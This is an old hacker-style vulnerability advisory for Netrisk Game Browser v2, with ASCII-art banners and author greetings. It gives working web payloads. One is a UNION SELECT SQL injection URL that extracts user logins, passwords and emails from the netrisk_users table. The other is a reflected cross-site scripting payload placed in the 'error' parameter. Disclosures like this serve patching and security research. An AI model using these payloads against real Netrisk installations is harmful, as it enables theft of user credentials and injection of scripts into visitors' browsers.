Netrisk Game Browser version 2 suffers from cross site scripting and remote SQL injection vulnerabilities.
f52115ffaaf3f930b8dcfd5e43d2e921f4c53c4361a53e657479677a7aefc72c
[*]##############################################
[+] |____ViRuS_HiMa@YouR SyS__|__\ #
[+] |______________________|___||\*___ #
[+] |______________________|___||""|"*\___, #
[+] |______________________|___||""|*"|___|| #
[+] "([ (@)''(@)""""""(|*(@)(@)********(@)* #
[+]====================================================================||
[*] About : Netrisk Game Browser v2 (Sql/Xss) Vulnerability ||
[!] Download : http://sourceforge.net/projects/netrisk/ ||
[!] Author : ViRuS_HiMa ||
[!] Site : wWw.HeLL-z0ne.org ||
[!] E-Mail : eGypT_GoVeRnMenT[at]HoTmaiL ||
[!]====================================================================||
[!] http://www.rasoulallah.net ||
[!]====================================================================||
[!] Sql : in user id ;
[!]
[!] http://localhost/netrisk/index.php?p=profile&id=sql
[!]
[!] e.g :
[!]
[!] http://localhost/net/index.php?p=profile&id=-1+union+select+1,
[!] 2,login,4,5,password,7,8,9,10,11,12,email,14,15+from+netrisk_users--
[!]
[!] xss vuln in :
[!]
[!] http://localhost/netrisk/index.php?p=browser&error=<script>alert(/hima/)</script>
[!]
[!]====================================================================||
[!] Greetz 2 SecurityReason & Indoshka & Hcj & Doksh & Kasper-Ksa ||
[*]====================================================================||